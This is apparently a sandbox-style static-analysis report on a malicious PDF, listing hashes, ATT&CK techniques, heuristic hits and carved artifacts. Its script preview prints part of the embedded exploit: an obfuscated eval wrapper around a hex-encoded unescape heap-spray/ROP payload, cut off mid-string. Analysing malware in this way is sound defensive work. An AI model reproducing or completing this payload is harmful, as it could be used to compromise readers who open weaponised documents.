Malicious PDF — malware analysis report

Static analysis result for SHA-256 736c5fc4ae073e1d…

MALICIOUS

PDF

45.5 KB
MD5: 6abe18e364877765049357f933afdfc5 SHA-1: 9b1bef4876487367c14491ddf425266f2a5b3ddc SHA-256: 736c5fc4ae073e1dff212044a9b374d62cce6a7db9af8990bfec5781baa48a3a
126 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript, identified by PDF_JAVASCRIPT and PDF_JS heuristics, and is flagged by a critical PDF JavaScript exploit cluster. The embedded JavaScript decodes a hexadecimal string which appears to be a second-stage payload. The presence of XFA forms and the use of String.fromCharCode further indicate a malicious PDF designed to exploit vulnerabilities and execute arbitrary code.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text
    • http://ns.adobe.com/xdp/In PDF document text
    • http://www.xfa.org/schema/xci/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.6/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js
429b94f5ec39f0ba40fa9540b05aa7a7bb130c6a302526277be060d720110389		 pdf-javascript-stream PDF /JS object 12 at offset 0xA0B3 4508 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev       a     l        (a);".split(" ").join(""));
       var s='207661722046486b6554203d20756e6573636170653b20766172204e6341697550203d2046486b65542820222575343134312575343134312575363361352575346138302575303030302575346138612575323139362575346138302575316639302575346138302575393033632575346138342575623639322575346138302575313036342575346138302575323263382575346138352575303030302575313030302575303030302575303030302575303030302575303030302575303030322575303030302575303130322575303030302575303030302575303030302575363361352575346138302575313036342575346138302575326462322575346138342575326162312575346138302575303030382575303030302575613861362575346138302575316639302575346138302575393033382575346138342575623639322575346138302575313036342575346138302575666666662575666666662575303030302575303030302575303034302575303030302575303030302575303030302575303030302575303030312575303030302575303030302575363361352575346138302575313036342575346138302575326462322575346138342575326162312575346138302575303030382575303030302575613861362575346138302575316639302575346138302575393033302575346138342575623639322575346138302575313036342575346138302575666666662575666666662575303032322575303030302575303030302575303030302575303030302575303030302575303030302575303030312575363361352575346138302575303030342575346138612575323139362575346138302575363361352575346138302575313036342575346138302575326462322575346138342575326162312575346138302575303033302575303030302575613861362575346138302575316639302575346138302575303030342575346138612575613764382575346138302575363361352575346138302575313036342575346138302575326462322575346138342575326162312575346138302575303032302575303030302575613861362575346138302575363361352575346138302575313036342575346138302575616564632575346138302575316639302575346138302575303033342575303030302575643538352575346138302575363361352575346138302575313036342575346138302575326462322575346138342575326162312575346138302575303030612575303030302575613861362575346138302575316639302575346138302575393137302575346138342575623639322575346138302575666666662575666666662575666666662575666666662575666666662575666666662575313030302575303030302575633164612575643462612575326464642575643939362575323437342575356566342575633933312575333362312575353633312575383331372575303463362575383230332575636663652575643636332575383631392575323638632575663964612575633330352575326265622575383037312575666335652575633466312575373735322575666335372575663565312575663337302575623334322575336161362575373535322575393036372575313739302575656131622575663763342575323532322575663931392575356236332575616264322575313033632575356334312575363434382575356435612575653339652575323565322575333339622575396639362575363361322575616230372575396265642575663332332575396163642575653765302575643533322575646338642575653463312575326434372575643732392575653261372575643831342575666132352575646535312575383964352575316461392575386136622575356336392575316662372575633636632575383733632575663735342575356539312575666231652575313435652575316637382575663936302575316266322575666365392575616164342575646161392575663766302575343236612575356461302575376264632575333962322575643938312575616262382575353864362575613165332575653832392575386339392575663232612575626561312575633334322575353132612575646331342575313666382575393665612575336561312575376636332575303333302575383065652575343765652575303331372575333731622575316265632575333236652575396261382575346538322575343961312575666461352575356263322575363063362575303735312575303732372575613264312575343133372220293b2076617220497355203d2046486b65542820222522202b20227522202b20223022202b20226322202b20223022202b20226322202b2022257522202b20223022202b20226322202b20223022202b2022632220293b207768696c6520284973552e6c656e677468202b203230202b2038203c20363535333629204973552b3d4973553b204271203d204973552e737562737472696e6728302c20283078306330632d30783234292f32293b204271202b3d204e63416975503b204271202b3d204973553b20664d7766203d2042712e737562737472696e6728302c2036353533362f32293b207768696c6528664d77662e6c656e677468203c20307838303030302920664d7766202b3d20664d77663b2050
... (truncated)
font_00_sfnt_off0000033c.bin
809d6a5a649de916f6b34cae6ee7d676e4ffb08967d9f9947dc2e3ae38a2157c		 pdf-font-stream PDF embedded font (sfnt) at offset 0x33C 65932 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.